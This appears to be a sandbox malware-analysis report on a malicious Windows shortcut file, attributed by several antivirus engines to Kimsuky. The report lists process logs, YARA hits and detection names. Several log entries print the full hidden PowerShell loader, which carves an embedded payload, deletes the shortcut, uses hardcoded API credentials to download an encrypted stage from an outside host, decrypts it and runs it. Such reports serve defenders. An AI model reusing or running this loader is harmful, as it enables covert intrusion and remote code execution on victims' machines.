CreateProcessInternalW Aug. 20, 2024, 5:55 p.m.	thread_identifier: 2660 thread_handle: 0x00000334 process_identifier: 2656 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000033c	1	1
CreateProcessInternalW Aug. 20, 2024, 5:55 p.m.	thread_identifier: 2756 thread_handle: 0x00000084 process_identifier: 2752 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Aug. 20, 2024, 5:55 p.m.	thread_identifier: 2860 thread_handle: 0x00000574 process_identifier: 2856 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000057c	1	1
CreateProcessInternalW Aug. 20, 2024, 5:55 p.m.	thread_identifier: 2924 thread_handle: 0x00000084 process_identifier: 2920 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 20, 2024, 5:55 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 20, 2024, 5:55 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 20, 2024, 5:55 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	한중 북중 안보현안 비공개 정책간담회 계획
parent_process	powershell.exe				martian_process	"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2544 resumed a thread in remote process 2656
NtResumeThread Aug. 20, 2024, 5:55 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2656	1	0	0

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user
option	-nop	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-noninteractive	value	Prevents creating an interactive prompt for the user

File has been identified by 24 AntiVirus engines on VirusTotal as malicious (24 events)

Skyhigh	BehavesLike.Dropper.tx
VIPRE	Heur.BZC.YAX.Boxter.331.8FF17DF1
Arcabit	Heur.BZC.YAX.Boxter.331.8FF17DF1
Symantec	Scr.Mallnk!gen13
Avast	LNK:Agent-IL [Trj]
Kaspersky	HEUR:Trojan.Multi.Powecod.i
BitDefender	Heur.BZC.YAX.Boxter.331.8FF17DF1
MicroWorld-eScan	Heur.BZC.YAX.Boxter.331.8FF17DF1
Rising	Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Emsisoft	Trojan.PowerShell.Gen (A)
DrWeb	Trojan.MulDrop26.46164
FireEye	Heur.BZC.YAX.Boxter.331.8FF17DF1
Sophos	Troj/LnkObf-T
SentinelOne	Static AI - Suspicious LNK
Google	Detected
MAX	malware (ai score=82)
Kingsoft	Script.Troj.CMDLnk.22143
Microsoft	Trojan:PowerShell/KimSuky.D!MTB
ZoneAlarm	HEUR:Trojan.Multi.Powecod.i
GData	Heur.BZC.YAX.Boxter.331.8FF17DF1
AhnLab-V3	Downloader/LNK.Powershell.S2543
VBA32	Trojan.Link.Crafted
Fortinet	LNK/Kimsuky.GOSU!tr
AVG	LNK:Agent-IL [Trj]

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\cmd.exe

한중 북중 안보현안 비공개 정책간담회 계획.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All